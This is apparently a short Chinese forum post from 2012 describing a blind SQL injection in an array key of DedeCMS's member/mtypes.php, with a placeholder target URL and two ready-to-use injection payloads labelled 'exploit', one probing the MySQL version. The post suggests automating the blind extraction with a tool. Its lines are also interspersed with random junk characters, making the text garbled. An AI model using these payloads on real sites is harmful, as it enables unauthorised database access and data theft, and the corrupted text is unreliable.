需要magic_quotes_gpc = Off,所以说是鸡肋啊.5 u3 u( n7 |% D
[8 G) N, \& E/ d6 ]8 q: Y
9 K! ^- s: `4 {9 b( d+ E发生在数组key里的注射漏洞,有点意思.1 M A, D/ x' g& Y3 x4 y) [
' V0 }' c H/ x" |' A. J. |
这里是盲注,就是麻烦点同样可以利用,可以写个工具,自动话的跑一下5 B2 n. i i( H# R+ ]; h; w
4 B8 g& B3 V$ h1 _1 Bhttp://www.xxx.com /dede/member/mtypes.php?dopost=save; W H$ {! F! b. [5 J
3 X& r y# {) F O/ [9 L! t
exploit:- q; f$ j; z2 Y* H/ q+ x9 V. `$ V
mtypename[7' and (@`'` or (56%3D56/*sql inject here*/)) and '3'%3D'3]=c4rp3nt3r
" N, U. F" ^* O& e$ s& }mtypename[7' and (@`'` or (substring(@@version,1,1)=5)) and '3'%3D'3]=c4rp3nt3r5 k+ g+ n7 c _7 R
|
发表于 2012-12-20 08:08:09
收藏
支持
反对